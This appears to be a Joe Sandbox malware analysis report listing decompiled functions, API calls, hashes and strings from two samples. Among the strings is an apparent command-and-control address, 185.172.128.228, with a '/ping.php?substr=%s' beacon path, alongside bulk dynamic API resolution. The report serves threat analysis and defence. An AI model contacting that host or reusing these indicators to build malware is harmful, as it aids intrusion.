Instruction ID: f1d65ff4a2caa8f4402a5ee0af87b259506669f2abbd9cc63769bcbaa0b6a130
Opcode Fuzzy Hash: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction Fuzzy Hash: 1D012D32500108BBDF116F96CC81DEF7F69EF99758F044129FE0866261D73AE861EBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0414CF11 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0414CF2B

Part of subcall function 0414CE78: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0414CEA7
Part of subcall function 0414CE78: ___AdjustPointer.LIBCMT ref: 0414CEC2

_UnwindNestedFrames.LIBCMT ref: 0414CF40
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0414CF51
CallCatchBlock.LIBVCRUNTIME ref: 0414CF79

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction ID: 910dc1de0337975c72d2f9673496fa6c57163338d58bc8daa1cf1b16ea506326
Opcode Fuzzy Hash: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction Fuzzy Hash: 6A014C72100108BBDF126E95DC80EEB7F6AEF99758F054004FE08A6120E736E962DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 041574BA Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0414ED94,00000000,00000000,?,04157461,0414ED94,00000000,00000000,00000000,?,04157719,00000006,0042F348), ref: 041574EC
GetLastError.KERNEL32(?,04157461,0414ED94,00000000,00000000,00000000,?,04157719,00000006,0042F348,0042F340,0042F348,00000000,00000364,?,04157052), ref: 041574F8
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,04157461,0414ED94,00000000,00000000,00000000,?,04157719,00000006,0042F348,0042F340,0042F348,00000000), ref: 04157506

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction ID: 470ffa0a89ab11a30e3dac1a3b74675d34f691ed8253a7bdb1f6c8a186e57727
Opcode Fuzzy Hash: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction Fuzzy Hash: 2001D836761227DBC7314F68AC85E967798AF04761F510570FE3AD31E0EB20E901C6D4

Uniqueness

Uniqueness Score: -1.00%

Function 0041293D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 004129CD

Strings

pow, xrefs: 004129A5, 004129C2

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 1002f3fead58ecdd09521feafb71d77c6abc34bad63ee383d6bbf70ab6509b6f
Instruction ID: 0a9ba9cf01538bb623dd895b254acf0ed02b79a8d0ee48bda8380b1111d13792
Opcode Fuzzy Hash: 1002f3fead58ecdd09521feafb71d77c6abc34bad63ee383d6bbf70ab6509b6f
Instruction Fuzzy Hash: 3651607175420196C7217718DF813FB6BA0EB40750F64497BE085C23A9EB7D8CE6DA8E

Uniqueness

Uniqueness Score: -1.00%

Function 0041DDFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0041DE21

Strings

.A, xrefs: 0041DE13
, xrefs: 0041DE66

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: Info
String ID: $.A
API String ID: 1807457897-2696116503
Opcode ID: 894c406951e1bf4a9ddc63c434b686542591dbb70d0a2e0ead158e77a5fc9e7b
Instruction ID: bc213980aac5c6bda6009a83c5849e62ad2cee4ae6a6ae2e32fe98ed2f123d1c
Opcode Fuzzy Hash: 894c406951e1bf4a9ddc63c434b686542591dbb70d0a2e0ead158e77a5fc9e7b
Instruction Fuzzy Hash: EA410AF190434C9EDB218E248D84BFABBB9DF55304F1404EEE58A97142D23DAA86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0414A937 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0414A96A
__IsNonwritableInCurrentImage.LIBCMT ref: 0414AA23

Strings

csm, xrefs: 0414AA0D

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction ID: 0b1314d9958baa8c570a703720edf576a589d0cb572c20137129db65a71e1206
Opcode Fuzzy Hash: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction Fuzzy Hash: 2E412B70A80209DBDF10DF68C8C4A9E7BB5EFC5368F1680A5E8195B391D731F955CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0041FD92 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002), ref: 0041FE6D

Strings

OCP, xrefs: 0041FDE6
ACP, xrefs: 0041FDB0

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction ID: db8a1e39b5ed56134af0dcb237998205fad8b660637b78a6cadd581e1e0cf4fb
Opcode Fuzzy Hash: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction Fuzzy Hash: 20213872A04301A6DB308E15D9017E7739A9B60B24F164077E90AC7312E73ADDC7C39C

Uniqueness

Uniqueness Score: -1.00%

Function 0415FFF9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002), ref: 041600D4

Strings

OCP, xrefs: 0416004D
ACP, xrefs: 04160017

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction ID: abdcb022de41547c865476b26882c0f2bfe2afcc2f2afdcd4efcc19c147ff23d
Opcode Fuzzy Hash: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction Fuzzy Hash: A921F862B01104E6E734CE54C981BAB7A6AEB4CBD8F1785A4ED0BD7140F737F9608354

Uniqueness

Uniqueness Score: -1.00%

Function 041662B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 041662B6

Part of subcall function 04141E19: __EH_prolog.LIBCMT ref: 04141E1E

Part of subcall function 0414266A: __EH_prolog.LIBCMT ref: 0414266F

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 04166398

Strings

,jC, xrefs: 0416638D

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: H_prolog$Ios_base_dtorstd::ios_base::_
String ID: ,jC
API String ID: 420165198-3201430929
Opcode ID: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction ID: ef8abb954f1ca24d537ef8a567c55142f07a0927e8248341f75b27f55c4fda2d
Opcode Fuzzy Hash: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction Fuzzy Hash: 2D31EBB5D01119EBEB14EF94D984AEDF7B4FF58304F1081AAE406A3640EB74AA58CF60

Uniqueness

Uniqueness Score: -1.00%

Function 004171B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00417217
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00417224

Strings

-@, xrefs: 004171EE, 00417202, 004171F3

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID: -@
API String ID: 2279764990-2564449678
Opcode ID: d5f4a00e4ea312b7d3a414fb44f76d48f23aa1c3aa7f8720876b6b1e831c6d21
Instruction ID: 290a678ed3add9fd0faa91afd9d0ee705692a8110a20fb2286b59343c35ba588
Opcode Fuzzy Hash: d5f4a00e4ea312b7d3a414fb44f76d48f23aa1c3aa7f8720876b6b1e831c6d21
Instruction Fuzzy Hash: 2B110A33A041209BAF369E19DC809DB73B5EB847247164172FD19AB354DA34DC86C6D9

Uniqueness

Uniqueness Score: -1.00%

Function 0040356F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00403574

Strings

/ping.php?substr=%s, xrefs: 0040357C
185.172.128.228, xrefs: 0040357B

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: H_prolog
String ID: /ping.php?substr=%s$185.172.128.228
API String ID: 3519838083-3577573015
Opcode ID: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction ID: 7b6dfb3f8f1c8d27c76164ee4eac5e21074d72dd8ad347809e0f3e64fbe8a7e5
Opcode Fuzzy Hash: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction Fuzzy Hash: 0F01C472A01114BBDB04AF899C41BAEF769EF45315F10013FF405E3292D3789E41C6E9

Uniqueness

Uniqueness Score: -1.00%

Function 00402FE5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402FEA
std::locale::_Init.LIBCPMT ref: 0040300E

Part of subcall function 00407D73: __EH_prolog3.LIBCMT ref: 00407D7A
Part of subcall function 00407D73: std::_Lockit::_Lockit.LIBCPMT ref: 00407D85
Part of subcall function 00407D73: std::locale::_Setgloballocale.LIBCPMT ref: 00407DA0
Part of subcall function 00407D73: _Yarn.LIBCPMT ref: 00407DB6
Part of subcall function 00407D73: std::_Lockit::~_Lockit.LIBCPMT ref: 00407DF6

Strings

T*@, xrefs: 00402FFA

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prologH_prolog3InitLockit::_Lockit::~_SetgloballocaleYarn
String ID: T*@
API String ID: 4198646248-2370032326
Opcode ID: 3ec9199d66afed3907134f97eebd3b9b00bf7a97696591750704becf4680ddf6
Instruction ID: f5781f1056de0421007c94b05f43b79da385089699a731dc7870890d3004fbc1
Opcode Fuzzy Hash: 3ec9199d66afed3907134f97eebd3b9b00bf7a97696591750704becf4680ddf6
Instruction Fuzzy Hash: 8B21B0B5A00A06AFC305DF6AD580995FBF4FF49314B41826FE809D7B50E774A924CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 041437D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 041437DB

Strings

/ping.php?substr=%s, xrefs: 041437E3
185.172.128.228, xrefs: 041437E2

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: /ping.php?substr=%s$185.172.128.228
API String ID: 3519838083-3577573015
Opcode ID: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction ID: 3d549e17f911564bd1952ff4188620cfedf7de7688d8c951860f5185488b8cc4
Opcode Fuzzy Hash: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction Fuzzy Hash: 0401C0B2A01119ABE704DF98DC80BAEF7B9FF84714F14012AF815E3240D370AA5086E0

Uniqueness

Uniqueness Score: -1.00%

Function 0040436E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00404373

Part of subcall function 00403A42: __EH_prolog.LIBCMT ref: 00403A47

__Getcoll.LIBCPMT ref: 004043CF

Strings

u@@, xrefs: 004043C9

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: H_prolog$Getcoll
String ID: u@@
API String ID: 206117190-736001340
Opcode ID: 270736e8c7e434f475df5a6f2add70e77253c20f60e327508c33da834ea4415e
Instruction ID: 69c11f36173d25db8645085f4dff982521935f2d07d38959ddb20a2960a7de4d
Opcode Fuzzy Hash: 270736e8c7e434f475df5a6f2add70e77253c20f60e327508c33da834ea4415e
Instruction Fuzzy Hash: B21170B19012099FCB04EFA9D581A9EB7B4FF44304F10843FE555BB281DB789A44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6D4 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0041A76A
GetLastError.KERNEL32 ref: 0041A778
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0041A7D3

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: be72b92f97b89cfc26330611fce1d14ea8f59d6c2fceb8f783a7245ea47926fa
Instruction ID: a04565de271e9a0d08a9f39f26722ecfcdc9a59ce40c97fd2178d4ba0242ee74
Opcode Fuzzy Hash: be72b92f97b89cfc26330611fce1d14ea8f59d6c2fceb8f783a7245ea47926fa
Instruction Fuzzy Hash: 5541E934602246AFCF219F69C9447FB7BB4EF01310F14416AEC6997291D738CDA2C75A

Uniqueness

Uniqueness Score: -1.00%

Function 0415A93B Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0415A9D1
GetLastError.KERNEL32 ref: 0415A9DF
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0415AA3A

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 1894267bdade2e88736a9571c484462cb95094bdf69f1057654e56dd2360f15e
Instruction ID: fdbba24a4022b4b648b5daebb0656c6ee8524c307194c825974aaa4415a18af3
Opcode Fuzzy Hash: 1894267bdade2e88736a9571c484462cb95094bdf69f1057654e56dd2360f15e
Instruction Fuzzy Hash: 1341C435640216EFDF258F64C9C4BEA7BA4AF41390F1582A9ED7DE71B0E730A901C760

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: u5qk.0.exePID: 7516, Parent PID: 7436COMMON

Execution Graph

Execution Coverage:	4.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	41

Executed Functions

Function 00416240 Relevance: 165.7, APIs: 110, Instructions: 674
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,04054178), ref: 0041625D
GetProcAddress.KERNEL32(74DD0000,04054478), ref: 00416275
GetProcAddress.KERNEL32(74DD0000,040705A0), ref: 0041628E
GetProcAddress.KERNEL32(74DD0000,04070540), ref: 004162A6
GetProcAddress.KERNEL32(74DD0000,040705D0), ref: 004162BE
GetProcAddress.KERNEL32(74DD0000,04070570), ref: 004162D7
GetProcAddress.KERNEL32(74DD0000,0406F8B0), ref: 004162EF
GetProcAddress.KERNEL32(74DD0000,04070510), ref: 00416307
GetProcAddress.KERNEL32(74DD0000,040761E0), ref: 00416320
GetProcAddress.KERNEL32(74DD0000,040760A8), ref: 00416338
GetProcAddress.KERNEL32(74DD0000,04076288), ref: 00416350
GetProcAddress.KERNEL32(74DD0000,040542D8), ref: 00416369
GetProcAddress.KERNEL32(74DD0000,04054438), ref: 00416381
GetProcAddress.KERNEL32(74DD0000,040543F8), ref: 00416399
GetProcAddress.KERNEL32(74DD0000,04054458), ref: 004163B2
GetProcAddress.KERNEL32(74DD0000,04076138), ref: 004163CA
GetProcAddress.KERNEL32(74DD0000,040760D8), ref: 004163E2
GetProcAddress.KERNEL32(74DD0000,0406F928), ref: 004163FB
GetProcAddress.KERNEL32(74DD0000,04054298), ref: 00416413
GetProcAddress.KERNEL32(74DD0000,04076258), ref: 0041642B
GetProcAddress.KERNEL32(74DD0000,04076348), ref: 00416444
GetProcAddress.KERNEL32(74DD0000,040761C8), ref: 0041645C
GetProcAddress.KERNEL32(74DD0000,04076210), ref: 00416474
GetProcAddress.KERNEL32(74DD0000,04054618), ref: 0041648D
GetProcAddress.KERNEL32(74DD0000,04076228), ref: 004164A5
GetProcAddress.KERNEL32(74DD0000,040760F0), ref: 004164BD
GetProcAddress.KERNEL32(74DD0000,040762D0), ref: 004164D6
GetProcAddress.KERNEL32(74DD0000,04076108), ref: 004164EE
GetProcAddress.KERNEL32(74DD0000,04076240), ref: 00416506
GetProcAddress.KERNEL32(74DD0000,040762E8), ref: 0041651F
GetProcAddress.KERNEL32(74DD0000,04076270), ref: 00416537
GetProcAddress.KERNEL32(74DD0000,04076150), ref: 0041654F
GetProcAddress.KERNEL32(74DD0000,04076318), ref: 00416568
GetProcAddress.KERNEL32(74DD0000,04072178), ref: 00416580
GetProcAddress.KERNEL32(74DD0000,04076330), ref: 00416598
GetProcAddress.KERNEL32(74DD0000,04076060), ref: 004165B1
GetProcAddress.KERNEL32(74DD0000,04054638), ref: 004165C9
GetProcAddress.KERNEL32(74DD0000,04076300), ref: 004165E1
GetProcAddress.KERNEL32(74DD0000,040543D8), ref: 004165FA
GetProcAddress.KERNEL32(74DD0000,04076168), ref: 00416612
GetProcAddress.KERNEL32(74DD0000,04076078), ref: 0041662A
GetProcAddress.KERNEL32(74DD0000,040542F8), ref: 00416643
GetProcAddress.KERNEL32(74DD0000,04054498), ref: 0041665B
LoadLibraryA.KERNEL32(040762A0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041666D
LoadLibraryA.KERNEL32(04076090,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041667E
LoadLibraryA.KERNEL32(040762B8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 00416690
LoadLibraryA.KERNEL32(040760C0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166A2
LoadLibraryA.KERNEL32(04076120,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166B3
LoadLibraryA.KERNEL32(04076180,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166C5
LoadLibraryA.KERNEL32(04076198,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166D7
LoadLibraryA.KERNEL32(040761B0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166E8
GetProcAddress.KERNEL32(75290000,040544B8), ref: 0041670A
GetProcAddress.KERNEL32(75290000,040761F8), ref: 00416722
GetProcAddress.KERNEL32(75290000,04070918), ref: 0041673A
GetProcAddress.KERNEL32(75290000,040763F0), ref: 00416753
GetProcAddress.KERNEL32(75290000,040544D8), ref: 0041676B
GetProcAddress.KERNEL32(734C0000,0406F900), ref: 00416790
GetProcAddress.KERNEL32(734C0000,040544F8), ref: 004167A9
GetProcAddress.KERNEL32(734C0000,0406F950), ref: 004167C1
GetProcAddress.KERNEL32(734C0000,04076360), ref: 004167D9
GetProcAddress.KERNEL32(734C0000,040763A8), ref: 004167F2
GetProcAddress.KERNEL32(734C0000,04054418), ref: 0041680A
GetProcAddress.KERNEL32(734C0000,04054318), ref: 00416822
GetProcAddress.KERNEL32(734C0000,040763C0), ref: 0041683B
GetProcAddress.KERNEL32(752C0000,04054558), ref: 0041685C
GetProcAddress.KERNEL32(752C0000,04054338), ref: 00416874
GetProcAddress.KERNEL32(752C0000,04076420), ref: 0041688D
GetProcAddress.KERNEL32(752C0000,040763D8), ref: 004168A5
GetProcAddress.KERNEL32(752C0000,04054518), ref: 004168BD
GetProcAddress.KERNEL32(74EC0000,0406F978), ref: 004168E3
GetProcAddress.KERNEL32(74EC0000,0406FA90), ref: 004168FB
GetProcAddress.KERNEL32(74EC0000,04076408), ref: 00416913
GetProcAddress.KERNEL32(74EC0000,04054398), ref: 0041692C
GetProcAddress.KERNEL32(74EC0000,04054538), ref: 00416944
GetProcAddress.KERNEL32(74EC0000,0406F9A0), ref: 0041695C
GetProcAddress.KERNEL32(75BD0000,04076378), ref: 00416982
GetProcAddress.KERNEL32(75BD0000,04054578), ref: 0041699A
GetProcAddress.KERNEL32(75BD0000,04070858), ref: 004169B2
GetProcAddress.KERNEL32(75BD0000,04076390), ref: 004169CB
GetProcAddress.KERNEL32(75BD0000,040764C8), ref: 004169E3
GetProcAddress.KERNEL32(75BD0000,04054358), ref: 004169FB
GetProcAddress.KERNEL32(75BD0000,04054598), ref: 00416A14
GetProcAddress.KERNEL32(75BD0000,040765D0), ref: 00416A2C
GetProcAddress.KERNEL32(75BD0000,04076750), ref: 00416A44
GetProcAddress.KERNEL32(75A70000,040545B8), ref: 00416A66
GetProcAddress.KERNEL32(75A70000,04076468), ref: 00416A7E
GetProcAddress.KERNEL32(75A70000,040765B8), ref: 00416A96
GetProcAddress.KERNEL32(75A70000,04076690), ref: 00416AAF
GetProcAddress.KERNEL32(75A70000,040765A0), ref: 00416AC7
GetProcAddress.KERNEL32(75450000,040542B8), ref: 00416AE8
GetProcAddress.KERNEL32(75450000,040543B8), ref: 00416B01
GetProcAddress.KERNEL32(75DA0000,04054378), ref: 00416B22
GetProcAddress.KERNEL32(75DA0000,04076630), ref: 00416B3A
GetProcAddress.KERNEL32(6F090000,040545D8), ref: 00416B60
GetProcAddress.KERNEL32(6F090000,040545F8), ref: 00416B78
GetProcAddress.KERNEL32(6F090000,04077450), ref: 00416B90
GetProcAddress.KERNEL32(6F090000,04076600), ref: 00416BA9
GetProcAddress.KERNEL32(6F090000,04077430), ref: 00416BC1
GetProcAddress.KERNEL32(6F090000,04077150), ref: 00416BD9
GetProcAddress.KERNEL32(6F090000,04077290), ref: 00416BF2
GetProcAddress.KERNEL32(6F090000,040773B0), ref: 00416C0A
GetProcAddress.KERNEL32(75AF0000,04076720), ref: 00416C2B
GetProcAddress.KERNEL32(75AF0000,040708F8), ref: 00416C44
GetProcAddress.KERNEL32(75AF0000,040765E8), ref: 00416C5C
GetProcAddress.KERNEL32(75AF0000,04076738), ref: 00416C74
GetProcAddress.KERNEL32(75D90000,04077310), ref: 00416C96
GetProcAddress.KERNEL32(6CB80000,04076480), ref: 00416CB7
GetProcAddress.KERNEL32(6CB80000,040771B0), ref: 00416CCF
GetProcAddress.KERNEL32(6CB80000,04076618), ref: 00416CE8
GetProcAddress.KERNEL32(6CB80000,04076588), ref: 00416D00

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
Instruction ID: 6fdcbfc83a7e6ced85b92bf4002cf1d70b18d179e1e2f66c0d1faa926a602d30
Opcode Fuzzy Hash: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
Instruction Fuzzy Hash: 6E623EB5510E10AFC374DFA8FE88A1637ABBBCC311311A519A60AC72A4DF759483CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00411650 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 237
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00411669
FindFirstFileA.KERNEL32(?,?), ref: 00411680
lstrcat.KERNEL32(?,?), ref: 004116D2
StrCmpCA.SHLWAPI(?,0041D7F8), ref: 004116E4
StrCmpCA.SHLWAPI(?,0041D7FC), ref: 004116FA
FindNextFileA.KERNELBASE(000000FF,?), ref: 00411980
FindClose.KERNEL32(000000FF), ref: 00411995

Strings

%s\*, xrefs: 0041165D
%s\%s\%s, xrefs: 004117DB
%s%s, xrefs: 00411838
%s\%s, xrefs: 00411714
%s\%s, xrefs: 004117FD

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
